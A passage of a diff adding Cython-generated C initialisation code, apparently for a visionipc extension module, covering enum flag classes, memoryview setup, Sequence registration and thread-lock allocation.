__PYX_ERR(1, 48, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __pyx_t_6 = __Pyx_PyDict_NewPresized(0); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 48, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __pyx_t_4 = __Pyx_Py3MetaclassPrepare(((PyObject *)__pyx_ptype___Pyx_EnumMeta), __pyx_t_3, __pyx_n_s_Pyx_FlagBase, __pyx_n_s_Pyx_FlagBase, __pyx_t_6, __pyx_n_s_EnumBase, (PyObject *) NULL); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 48, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + if (__pyx_t_3 != __pyx_t_5) { + if (unlikely((PyDict_SetItemString(__pyx_t_4, "__orig_bases__", __pyx_t_5) < 0))) __PYX_ERR(1, 48, __pyx_L1_error) + } + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + + /* "EnumBase":49 + * cdef object __Pyx_FlagBase + * class __Pyx_FlagBase(int, metaclass=__Pyx_EnumMeta): + * def __new__(cls, value, name=None): # <<<<<<<<<<<<<< + * for v in cls: + * if v == value: + */ + __pyx_t_5 = __Pyx_CyFunction_New(&__pyx_mdef_8EnumBase_14__Pyx_FlagBase_1__new__, __Pyx_CYFUNCTION_STATICMETHOD, __pyx_n_s_Pyx_FlagBase___new, NULL, __pyx_n_s_EnumBase, __pyx_d, ((PyObject *)__pyx_codeobj__28)); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 49, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_CyFunction_SetDefaultsTuple(__pyx_t_5, __pyx_tuple__29); + if (__Pyx_SetNewInClass(__pyx_t_4, __pyx_n_s_new, __pyx_t_5) < 0) __PYX_ERR(1, 49, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + + /* "EnumBase":62 + * cls.__members__[name] = res + * return res + * def __repr__(self): # <<<<<<<<<<<<<< + * return "<%s.%s: %d>" % (self.__class__.__name__, self.name, self) + * def __str__(self): + */ + __pyx_t_5 = __Pyx_CyFunction_New(&__pyx_mdef_8EnumBase_14__Pyx_FlagBase_3__repr__, 0, __pyx_n_s_Pyx_FlagBase___repr, NULL, __pyx_n_s_EnumBase, __pyx_d, ((PyObject *)__pyx_codeobj__30)); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 62, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + if (__Pyx_SetNameInClass(__pyx_t_4, __pyx_n_s_repr, __pyx_t_5) < 0) __PYX_ERR(1, 62, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + + /* "EnumBase":64 + * def __repr__(self): + * return "<%s.%s: %d>" % (self.__class__.__name__, self.name, self) + * def __str__(self): # <<<<<<<<<<<<<< + * return "%s.%s" % (self.__class__.__name__, self.name) + * + */ + __pyx_t_5 = __Pyx_CyFunction_New(&__pyx_mdef_8EnumBase_14__Pyx_FlagBase_5__str__, 0, __pyx_n_s_Pyx_FlagBase___str, NULL, __pyx_n_s_EnumBase, __pyx_d, ((PyObject *)__pyx_codeobj__31)); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 64, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + if (__Pyx_SetNameInClass(__pyx_t_4, __pyx_n_s_str, __pyx_t_5) < 0) __PYX_ERR(1, 64, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + + /* "EnumBase":48 + * + * cdef object __Pyx_FlagBase + * class __Pyx_FlagBase(int, metaclass=__Pyx_EnumMeta): # <<<<<<<<<<<<<< + * def __new__(cls, value, name=None): + * for v in cls: + */ + __pyx_t_5 = __Pyx_Py3ClassCreate(((PyObject *)__pyx_ptype___Pyx_EnumMeta), __pyx_n_s_Pyx_FlagBase, __pyx_t_3, __pyx_t_4, __pyx_t_6, 1, 0); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 48, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __Pyx_XGOTREF(__Pyx_FlagBase); + __Pyx_DECREF_SET(__Pyx_FlagBase, __pyx_t_5); + __Pyx_GIVEREF(__pyx_t_5); + __pyx_t_5 = 0; + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + + /* "EnumBase":67 + * return "%s.%s" % (self.__class__.__name__, self.name) + * + * if PY_VERSION_HEX >= 0x03060000: # <<<<<<<<<<<<<< + * from enum import IntFlag as __Pyx_FlagBase + * + */ + __pyx_t_2 = (PY_VERSION_HEX >= 0x03060000); + if (__pyx_t_2) { + + /* "EnumBase":68 + * + * if PY_VERSION_HEX >= 0x03060000: + * from enum import IntFlag as __Pyx_FlagBase # <<<<<<<<<<<<<< + * + */ + __pyx_t_3 = PyList_New(1); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 68, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_INCREF(__pyx_n_s_IntFlag); + __Pyx_GIVEREF(__pyx_n_s_IntFlag); + PyList_SET_ITEM(__pyx_t_3, 0, __pyx_n_s_IntFlag); + __pyx_t_6 = __Pyx_Import(__pyx_n_s_enum, __pyx_t_3, 0); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 68, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __pyx_t_3 = __Pyx_ImportFrom(__pyx_t_6, __pyx_n_s_IntFlag); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 68, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_INCREF(__pyx_t_3); + __Pyx_XGOTREF(__Pyx_FlagBase); + __Pyx_DECREF_SET(__Pyx_FlagBase, __pyx_t_3); + __Pyx_GIVEREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + + /* "EnumBase":67 + * return "%s.%s" % (self.__class__.__name__, self.name) + * + * if PY_VERSION_HEX >= 0x03060000: # <<<<<<<<<<<<<< + * from enum import IntFlag as __Pyx_FlagBase + * + */ + } + + /* "(tree fragment)":1 + * def __pyx_unpickle___Pyx_EnumMeta(__pyx_type, long __pyx_checksum, __pyx_state): # <<<<<<<<<<<<<< + * cdef object __pyx_PickleError + * cdef object __pyx_result + */ + __pyx_t_6 = __Pyx_CyFunction_New(&__pyx_mdef_8EnumBase_1__pyx_unpickle___Pyx_EnumMeta, 0, __pyx_n_s_pyx_unpickle___Pyx_EnumMeta, NULL, __pyx_n_s_EnumBase, __pyx_d, ((PyObject *)__pyx_codeobj__33)); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 1, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_6); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_pyx_unpickle___Pyx_EnumMeta, __pyx_t_6) < 0) __PYX_ERR(1, 1, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + + /* "View.MemoryView":99 + * + * cdef object __pyx_collections_abc_Sequence "__pyx_collections_abc_Sequence" + * try: # <<<<<<<<<<<<<< + * if __import__("sys").version_info >= (3, 3): + * __pyx_collections_abc_Sequence = __import__("collections.abc").abc.Sequence + */ + { + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + __Pyx_ExceptionSave(&__pyx_t_1, &__pyx_t_7, &__pyx_t_8); + __Pyx_XGOTREF(__pyx_t_1); + __Pyx_XGOTREF(__pyx_t_7); + __Pyx_XGOTREF(__pyx_t_8); + /*try:*/ { + + /* "View.MemoryView":100 + * cdef object __pyx_collections_abc_Sequence "__pyx_collections_abc_Sequence" + * try: + * if __import__("sys").version_info >= (3, 3): # <<<<<<<<<<<<<< + * __pyx_collections_abc_Sequence = __import__("collections.abc").abc.Sequence + * else: + */ + __pyx_t_6 = __Pyx_PyObject_Call(__pyx_builtin___import__, __pyx_tuple__34, NULL); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 100, __pyx_L5_error) + __Pyx_GOTREF(__pyx_t_6); + __pyx_t_3 = __Pyx_PyObject_GetAttrStr(__pyx_t_6, __pyx_n_s_version_info); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 100, __pyx_L5_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + __pyx_t_6 = PyObject_RichCompare(__pyx_t_3, __pyx_tuple__35, Py_GE); __Pyx_XGOTREF(__pyx_t_6); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 100, __pyx_L5_error) + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __pyx_t_2 = __Pyx_PyObject_IsTrue(__pyx_t_6); if (unlikely((__pyx_t_2 < 0))) __PYX_ERR(1, 100, __pyx_L5_error) + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + if (__pyx_t_2) { + + /* "View.MemoryView":101 + * try: + * if __import__("sys").version_info >= (3, 3): + * __pyx_collections_abc_Sequence = __import__("collections.abc").abc.Sequence # <<<<<<<<<<<<<< + * else: + * __pyx_collections_abc_Sequence = __import__("collections").Sequence + */ + __pyx_t_6 = __Pyx_PyObject_Call(__pyx_builtin___import__, __pyx_tuple__36, NULL); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 101, __pyx_L5_error) + __Pyx_GOTREF(__pyx_t_6); + __pyx_t_3 = __Pyx_PyObject_GetAttrStr(__pyx_t_6, __pyx_n_s_abc); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 101, __pyx_L5_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + __pyx_t_6 = __Pyx_PyObject_GetAttrStr(__pyx_t_3, __pyx_n_s_Sequence); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 101, __pyx_L5_error) + __Pyx_GOTREF(__pyx_t_6); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __Pyx_XGOTREF(__pyx_collections_abc_Sequence); + __Pyx_DECREF_SET(__pyx_collections_abc_Sequence, __pyx_t_6); + __Pyx_GIVEREF(__pyx_t_6); + __pyx_t_6 = 0; + + /* "View.MemoryView":100 + * cdef object __pyx_collections_abc_Sequence "__pyx_collections_abc_Sequence" + * try: + * if __import__("sys").version_info >= (3, 3): # <<<<<<<<<<<<<< + * __pyx_collections_abc_Sequence = __import__("collections.abc").abc.Sequence + * else: + */ + goto __pyx_L11; + } + + /* "View.MemoryView":103 + * __pyx_collections_abc_Sequence = __import__("collections.abc").abc.Sequence + * else: + * __pyx_collections_abc_Sequence = __import__("collections").Sequence # <<<<<<<<<<<<<< + * except: + * + */ + /*else*/ { + __pyx_t_6 = __Pyx_PyObject_Call(__pyx_builtin___import__, __pyx_tuple__37, NULL); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 103, __pyx_L5_error) + __Pyx_GOTREF(__pyx_t_6); + __pyx_t_3 = __Pyx_PyObject_GetAttrStr(__pyx_t_6, __pyx_n_s_Sequence); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 103, __pyx_L5_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + __Pyx_XGOTREF(__pyx_collections_abc_Sequence); + __Pyx_DECREF_SET(__pyx_collections_abc_Sequence, __pyx_t_3); + __Pyx_GIVEREF(__pyx_t_3); + __pyx_t_3 = 0; + } + __pyx_L11:; + + /* "View.MemoryView":99 + * + * cdef object __pyx_collections_abc_Sequence "__pyx_collections_abc_Sequence" + * try: # <<<<<<<<<<<<<< + * if __import__("sys").version_info >= (3, 3): + * __pyx_collections_abc_Sequence = __import__("collections.abc").abc.Sequence + */ + } + __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_XDECREF(__pyx_t_7); __pyx_t_7 = 0; + __Pyx_XDECREF(__pyx_t_8); __pyx_t_8 = 0; + goto __pyx_L10_try_end; + __pyx_L5_error:; + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + __Pyx_XDECREF(__pyx_t_4); __pyx_t_4 = 0; + __Pyx_XDECREF(__pyx_t_5); __pyx_t_5 = 0; + __Pyx_XDECREF(__pyx_t_6); __pyx_t_6 = 0; + + /* "View.MemoryView":104 + * else: + * __pyx_collections_abc_Sequence = __import__("collections").Sequence + * except: # <<<<<<<<<<<<<< + * + * __pyx_collections_abc_Sequence = None + */ + /*except:*/ { + __Pyx_AddTraceback("View.MemoryView", __pyx_clineno, __pyx_lineno, __pyx_filename); + if (__Pyx_GetException(&__pyx_t_3, &__pyx_t_6, &__pyx_t_4) < 0) __PYX_ERR(1, 104, __pyx_L7_except_error) + __Pyx_XGOTREF(__pyx_t_3); + __Pyx_XGOTREF(__pyx_t_6); + __Pyx_XGOTREF(__pyx_t_4); + + /* "View.MemoryView":106 + * except: + * + * __pyx_collections_abc_Sequence = None # <<<<<<<<<<<<<< + * + * + */ + __Pyx_INCREF(Py_None); + __Pyx_XGOTREF(__pyx_collections_abc_Sequence); + __Pyx_DECREF_SET(__pyx_collections_abc_Sequence, Py_None); + __Pyx_GIVEREF(Py_None); + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + __Pyx_XDECREF(__pyx_t_6); __pyx_t_6 = 0; + __Pyx_XDECREF(__pyx_t_4); __pyx_t_4 = 0; + goto __pyx_L6_exception_handled; + } + + /* "View.MemoryView":99 + * + * cdef object __pyx_collections_abc_Sequence "__pyx_collections_abc_Sequence" + * try: # <<<<<<<<<<<<<< + * if __import__("sys").version_info >= (3, 3): + * __pyx_collections_abc_Sequence = __import__("collections.abc").abc.Sequence + */ + __pyx_L7_except_error:; + __Pyx_XGIVEREF(__pyx_t_1); + __Pyx_XGIVEREF(__pyx_t_7); + __Pyx_XGIVEREF(__pyx_t_8); + __Pyx_ExceptionReset(__pyx_t_1, __pyx_t_7, __pyx_t_8); + goto __pyx_L1_error; + __pyx_L6_exception_handled:; + __Pyx_XGIVEREF(__pyx_t_1); + __Pyx_XGIVEREF(__pyx_t_7); + __Pyx_XGIVEREF(__pyx_t_8); + __Pyx_ExceptionReset(__pyx_t_1, __pyx_t_7, __pyx_t_8); + __pyx_L10_try_end:; + } + + /* "View.MemoryView":241 + * + * + * try: # <<<<<<<<<<<<<< + * count = __pyx_collections_abc_Sequence.count + * index = __pyx_collections_abc_Sequence.index + */ + { + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + __Pyx_ExceptionSave(&__pyx_t_8, &__pyx_t_7, &__pyx_t_1); + __Pyx_XGOTREF(__pyx_t_8); + __Pyx_XGOTREF(__pyx_t_7); + __Pyx_XGOTREF(__pyx_t_1); + /*try:*/ { + + /* "View.MemoryView":242 + * + * try: + * count = __pyx_collections_abc_Sequence.count # <<<<<<<<<<<<<< + * index = __pyx_collections_abc_Sequence.index + * except: + */ + __pyx_t_4 = __Pyx_PyObject_GetAttrStr(__pyx_collections_abc_Sequence, __pyx_n_s_count); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 242, __pyx_L14_error) + __Pyx_GOTREF(__pyx_t_4); + if (PyDict_SetItem(__pyx_array_type->tp_dict, __pyx_n_s_count, __pyx_t_4) < 0) __PYX_ERR(1, 242, __pyx_L14_error) + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + PyType_Modified(__pyx_array_type); + + /* "View.MemoryView":243 + * try: + * count = __pyx_collections_abc_Sequence.count + * index = __pyx_collections_abc_Sequence.index # <<<<<<<<<<<<<< + * except: + * pass + */ + __pyx_t_4 = __Pyx_PyObject_GetAttrStr(__pyx_collections_abc_Sequence, __pyx_n_s_index); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 243, __pyx_L14_error) + __Pyx_GOTREF(__pyx_t_4); + if (PyDict_SetItem(__pyx_array_type->tp_dict, __pyx_n_s_index, __pyx_t_4) < 0) __PYX_ERR(1, 243, __pyx_L14_error) + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + PyType_Modified(__pyx_array_type); + + /* "View.MemoryView":241 + * + * + * try: # <<<<<<<<<<<<<< + * count = __pyx_collections_abc_Sequence.count + * index = __pyx_collections_abc_Sequence.index + */ + } + __Pyx_XDECREF(__pyx_t_8); __pyx_t_8 = 0; + __Pyx_XDECREF(__pyx_t_7); __pyx_t_7 = 0; + __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; + goto __pyx_L19_try_end; + __pyx_L14_error:; + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + __Pyx_XDECREF(__pyx_t_4); __pyx_t_4 = 0; + __Pyx_XDECREF(__pyx_t_5); __pyx_t_5 = 0; + __Pyx_XDECREF(__pyx_t_6); __pyx_t_6 = 0; + + /* "View.MemoryView":244 + * count = __pyx_collections_abc_Sequence.count + * index = __pyx_collections_abc_Sequence.index + * except: # <<<<<<<<<<<<<< + * pass + * + */ + /*except:*/ { + __Pyx_ErrRestore(0,0,0); + goto __pyx_L15_exception_handled; + } + __pyx_L15_exception_handled:; + __Pyx_XGIVEREF(__pyx_t_8); + __Pyx_XGIVEREF(__pyx_t_7); + __Pyx_XGIVEREF(__pyx_t_1); + __Pyx_ExceptionReset(__pyx_t_8, __pyx_t_7, __pyx_t_1); + __pyx_L19_try_end:; + } + + /* "View.MemoryView":309 + * return self.name + * + * cdef generic = Enum("") # <<<<<<<<<<<<<< + * cdef strided = Enum("") # default + * cdef indirect = Enum("") + */ + __pyx_t_4 = __Pyx_PyObject_Call(((PyObject *)__pyx_MemviewEnum_type), __pyx_tuple__38, NULL); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 309, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_XGOTREF(generic); + __Pyx_DECREF_SET(generic, __pyx_t_4); + __Pyx_GIVEREF(__pyx_t_4); + __pyx_t_4 = 0; + + /* "View.MemoryView":310 + * + * cdef generic = Enum("") + * cdef strided = Enum("") # default # <<<<<<<<<<<<<< + * cdef indirect = Enum("") + * + */ + __pyx_t_4 = __Pyx_PyObject_Call(((PyObject *)__pyx_MemviewEnum_type), __pyx_tuple__39, NULL); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 310, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_XGOTREF(strided); + __Pyx_DECREF_SET(strided, __pyx_t_4); + __Pyx_GIVEREF(__pyx_t_4); + __pyx_t_4 = 0; + + /* "View.MemoryView":311 + * cdef generic = Enum("") + * cdef strided = Enum("") # default + * cdef indirect = Enum("") # <<<<<<<<<<<<<< + * + * + */ + __pyx_t_4 = __Pyx_PyObject_Call(((PyObject *)__pyx_MemviewEnum_type), __pyx_tuple__40, NULL); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 311, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_XGOTREF(indirect); + __Pyx_DECREF_SET(indirect, __pyx_t_4); + __Pyx_GIVEREF(__pyx_t_4); + __pyx_t_4 = 0; + + /* "View.MemoryView":314 + * + * + * cdef contiguous = Enum("") # <<<<<<<<<<<<<< + * cdef indirect_contiguous = Enum("") + * + */ + __pyx_t_4 = __Pyx_PyObject_Call(((PyObject *)__pyx_MemviewEnum_type), __pyx_tuple__41, NULL); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 314, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_XGOTREF(contiguous); + __Pyx_DECREF_SET(contiguous, __pyx_t_4); + __Pyx_GIVEREF(__pyx_t_4); + __pyx_t_4 = 0; + + /* "View.MemoryView":315 + * + * cdef contiguous = Enum("") + * cdef indirect_contiguous = Enum("") # <<<<<<<<<<<<<< + * + * + */ + __pyx_t_4 = __Pyx_PyObject_Call(((PyObject *)__pyx_MemviewEnum_type), __pyx_tuple__42, NULL); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 315, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_XGOTREF(indirect_contiguous); + __Pyx_DECREF_SET(indirect_contiguous, __pyx_t_4); + __Pyx_GIVEREF(__pyx_t_4); + __pyx_t_4 = 0; + + /* "View.MemoryView":323 + * + * + * cdef int __pyx_memoryview_thread_locks_used = 0 # <<<<<<<<<<<<<< + * cdef PyThread_type_lock[8] __pyx_memoryview_thread_locks = [ + * PyThread_allocate_lock(), + */ + __pyx_memoryview_thread_locks_used = 0; + + /* "View.MemoryView":324 + * + * cdef int __pyx_memoryview_thread_locks_used = 0 + * cdef PyThread_type_lock[8] __pyx_memoryview_thread_locks = [ # <<<<<<<<<<<<<< + * PyThread_allocate_lock(), + * PyThread_allocate_lock(), + */ + __pyx_t_9[0] = PyThread_allocate_lock(); + __pyx_t_9[1] = PyThread_allocate_lock(); + __pyx_t_9[2] = PyThread_allocate_lock(); + __pyx_t_9[3] = PyThread_allocate_lock(); + __pyx_t_9[4] = PyThread_allocate_lock(); + __pyx_t_9[5] = PyThread_allocate_lock(); + __pyx_t_9[6] = PyThread_allocate_lock(); + __pyx_t_9[7] = PyThread_allocate_lock(); + memcpy(&(__pyx_memoryview_thread_locks[0]), __pyx_t_9, sizeof(__pyx_memoryview_thread_locks[0]) * (8)); + + /* "View.MemoryView":982 + * + * + * try: # <<<<<<<<<<<<<< + * count = __pyx_collections_abc_Sequence.count + * index = __pyx_collections_abc_Sequence.index + */ + { + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + __Pyx_ExceptionSave(&__pyx_t_1, &__pyx_t_7, &__pyx_t_8); + __Pyx_XGOTREF(__pyx_t_1); + __Pyx_XGOTREF(__pyx_t_7); + __Pyx_XGOTREF(__pyx_t_8); + /*try:*/ { + + /* "View.MemoryView":983 + * + * try: + * count = __pyx_collections_abc_Sequence.count # <<<<<<<<<<<<<< + * index = __pyx_collections_abc_Sequence.index + * except: + */ + __pyx_t_4 = __Pyx_PyObject_GetAttrStr(__pyx_collections_abc_Sequence, __pyx_n_s_count); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 983, __pyx_L20_error) + __Pyx_GOTREF(__pyx_t_4); + if (PyDict_SetItem(__pyx_memoryviewslice_type->tp_dict, __pyx_n_s_count, __pyx_t_4) < 0) __PYX_ERR(1, 983, __pyx_L20_error) + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + PyType_Modified(__pyx_memoryviewslice_type); + + /* "View.MemoryView":984 + * try: + * count = __pyx_collections_abc_Sequence.count + * index = __pyx_collections_abc_Sequence.index # <<<<<<<<<<<<<< + * except: + * pass + */ + __pyx_t_4 = __Pyx_PyObject_GetAttrStr(__pyx_collections_abc_Sequence, __pyx_n_s_index); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 984, __pyx_L20_error) + __Pyx_GOTREF(__pyx_t_4); + if (PyDict_SetItem(__pyx_memoryviewslice_type->tp_dict, __pyx_n_s_index, __pyx_t_4) < 0) __PYX_ERR(1, 984, __pyx_L20_error) + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + PyType_Modified(__pyx_memoryviewslice_type); + + /* "View.MemoryView":982 + * + * + * try: # <<<<<<<<<<<<<< + * count = __pyx_collections_abc_Sequence.count + * index = __pyx_collections_abc_Sequence.index + */ + } + __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_XDECREF(__pyx_t_7); __pyx_t_7 = 0; + __Pyx_XDECREF(__pyx_t_8); __pyx_t_8 = 0; + goto __pyx_L25_try_end; + __pyx_L20_error:; + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + __Pyx_XDECREF(__pyx_t_4); __pyx_t_4 = 0; + __Pyx_XDECREF(__pyx_t_5); __pyx_t_5 = 0; + __Pyx_XDECREF(__pyx_t_6); __pyx_t_6 = 0; + + /* "View.MemoryView":985 + * count = __pyx_collections_abc_Sequence.count + * index = __pyx_collections_abc_Sequence.index + * except: # <<<<<<<<<<<<<< + * pass + * + */ + /*except:*/ { + __Pyx_ErrRestore(0,0,0); + goto __pyx_L21_exception_handled; + } + __pyx_L21_exception_handled:; + __Pyx_XGIVEREF(__pyx_t_1); + __Pyx_XGIVEREF(__pyx_t_7); + __Pyx_XGIVEREF(__pyx_t_8); + __Pyx_ExceptionReset(__pyx_t_1, __pyx_t_7, __pyx_t_8); + __pyx_L25_try_end:; + } + + /* "View.MemoryView":988 + * pass + * + * try: # <<<<<<<<<<<<<< + * if __pyx_collections_abc_Sequence: + * + */ + { + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + __Pyx_ExceptionSave(&__pyx_t_8, &__pyx_t_7, &__pyx_t_1); + __Pyx_XGOTREF(__pyx_t_8); + __Pyx_XGOTREF(__pyx_t_7); + __Pyx_XGOTREF(__pyx_t_1); + /*try:*/ { + + /* "View.MemoryView":989 + * + * try: + * if __pyx_collections_abc_Sequence: # <<<<<<<<<<<<<< + * + * + */ + __pyx_t_2 = __Pyx_PyObject_IsTrue(__pyx_collections_abc_Sequence); if (unlikely((__pyx_t_2 < 0))) __PYX_ERR(1, 989, __pyx_L26_error) + if (__pyx_t_2) { + + /* "View.MemoryView":993 + * + * + * __pyx_collections_abc_Sequence.register(_memoryviewslice) # <<<<<<<<<<<<<< + * __pyx_collections_abc_Sequence.register(array) + * except: + */ + __pyx_t_4 = __Pyx_PyObject_GetAttrStr(__pyx_collections_abc_Sequence, __pyx_n_s_register); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 993, __pyx_L26_error) + __Pyx_GOTREF(__pyx_t_4); + __pyx_t_6 = __Pyx_PyObject_CallOneArg(__pyx_t_4, ((PyObject *)__pyx_memoryviewslice_type)); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 993, __pyx_L26_error) + __Pyx_GOTREF(__pyx_t_6); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + + /* "View.MemoryView":994 + * + * __pyx_collections_abc_Sequence.register(_memoryviewslice) + * __pyx_collections_abc_Sequence.register(array) # <<<<<<<<<<<<<< + * except: + * pass # ignore failure, it's a minor issue + */ + __pyx_t_6 = __Pyx_PyObject_GetAttrStr(__pyx_collections_abc_Sequence, __pyx_n_s_register); if (unlikely(!__pyx_t_6)) __PYX_ERR(1, 994, __pyx_L26_error) + __Pyx_GOTREF(__pyx_t_6); + __pyx_t_4 = __Pyx_PyObject_CallOneArg(__pyx_t_6, ((PyObject *)__pyx_array_type)); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 994, __pyx_L26_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + + /* "View.MemoryView":989 + * + * try: + * if __pyx_collections_abc_Sequence: # <<<<<<<<<<<<<< + * + * + */ + } + + /* "View.MemoryView":988 + * pass + * + * try: # <<<<<<<<<<<<<< + * if __pyx_collections_abc_Sequence: + * + */ + } + __Pyx_XDECREF(__pyx_t_8); __pyx_t_8 = 0; + __Pyx_XDECREF(__pyx_t_7); __pyx_t_7 = 0; + __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; + goto __pyx_L31_try_end; + __pyx_L26_error:; + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + __Pyx_XDECREF(__pyx_t_4); __pyx_t_4 = 0; + __Pyx_XDECREF(__pyx_t_5); __pyx_t_5 = 0; + __Pyx_XDECREF(__pyx_t_6); __pyx_t_6 = 0; + + /* "View.MemoryView":995 + * __pyx_collections_abc_Sequence.register(_memoryviewslice) + * __pyx_collections_abc_Sequence.register(array) + * except: # <<<<<<<<<<<<<< + * pass # ignore failure, it's a minor issue + * + */ + /*except:*/ { + __Pyx_ErrRestore(0,0,0); + goto __pyx_L27_exception_handled; + } + __pyx_L27_exception_handled:; + __Pyx_XGIVEREF(__pyx_t_8); + __Pyx_XGIVEREF(__pyx_t_7); + __Pyx_XGIVEREF(__pyx_t_1); + __Pyx_ExceptionReset(__pyx_t_8, __pyx_t_7, __pyx_t_1); + __pyx_L31_try_end:; + } + + /* "(tree fragment)":1 + * def __pyx_unpickle_Enum(__pyx_type, long __pyx_checksum, __pyx_state): # <<<<<<<<<<<<<< + * cdef object __pyx_PickleError + * cdef object __pyx_result + */ + __pyx_t_4 = PyCFunction_NewEx(&__pyx_mdef_15View_dot_MemoryView_1__pyx_unpickle_Enum, NULL, __pyx_n_s_View_MemoryView); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 1, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_pyx_unpickle_Enum, __pyx_t_4) < 0) __PYX_ERR(1, 1, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + + /* "EnumType":76 + * object __Pyx_PyInt_From_enum____pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType(VisionStreamType value) + * + * cdef dict __Pyx_globals = globals() # <<<<<<<<<<<<<< + * if PY_VERSION_HEX >= 0x03060000: + * + */ + __pyx_t_4 = __Pyx_Globals(); if (unlikely(!__pyx_t_4)) __PYX_ERR(1, 76, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + if (!(likely(PyDict_CheckExact(__pyx_t_4))||((__pyx_t_4) == Py_None) || __Pyx_RaiseUnexpectedTypeError("dict", __pyx_t_4))) 